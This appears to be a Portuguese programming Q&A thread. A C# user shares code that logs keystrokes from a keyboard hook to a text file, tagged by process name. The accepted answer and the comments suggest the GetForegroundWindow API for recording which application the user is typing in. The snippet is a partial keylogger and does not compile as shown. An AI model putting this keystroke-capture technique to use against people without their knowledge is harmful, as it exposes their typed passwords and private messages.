# Como pegar o processo atual que o usuário está utilizando?

Tags: c#

Eu fiz um programa para pegar o processo atual do usuário, mas só o que ele pega é "
ConsoleApplication1.vshost" (
ConsoleApplication1 é o nome do programa), mesmo em janelas como o Google Chrome, etc.
Código:

```
Process process = Process.GetCurrentProcess();
int vkCode = Marshal.ReadInt32(lParam);
StreamWriter sw = new StreamWriter(Application.StartupPath + @"\log.txt", true);
process = Process.GetCurrentProcess();
if (x == process.ProcessName)
    sw.Write((Keys)vkCode);
else
{
    x = process.ProcessName;
    sw.Write("\n{0}", x);
}
sw.Close();
```

Estou fazendo isso da maneira errada? Como posso pegar o processo atual que o usuário está usando de maneira certa?

Answer (score 0, accepted):

Sim. Está.

Para recuperar o processo ativo (em uso) você deve pegar a janela em foco.

Para isso você deve usar a [API GetForegroundWindow](https://msdn.microsoft.com/pt-br/library/windows/desktop/ms633505(v=vs.85).aspx).

A partir do HWND retornado por esta API você é capaz de recuperar o nome do processo a qual esta janela pertence.

Comment: Tentei fazer dessa maneira e não funcionou: `string y = GetForegroundWindow().ToString();`

Comment: Não é assim que usa. Veja um exemplo aqui. http://www.pinvoke.net/default.aspx/user32.getforegroundwindow

Comment: Se eu copiar e colar da isso:
Erro CS0103 O nome "ApplicationState" não existe no contexto atual ConsoleApplication1   77 Ativo

Comment: Olha, você deve estudar um pouco mais sobre como utilizar as API's do Windows no C# (ou VB.net). É com elas que vai conseguir atingir o seu objetivo.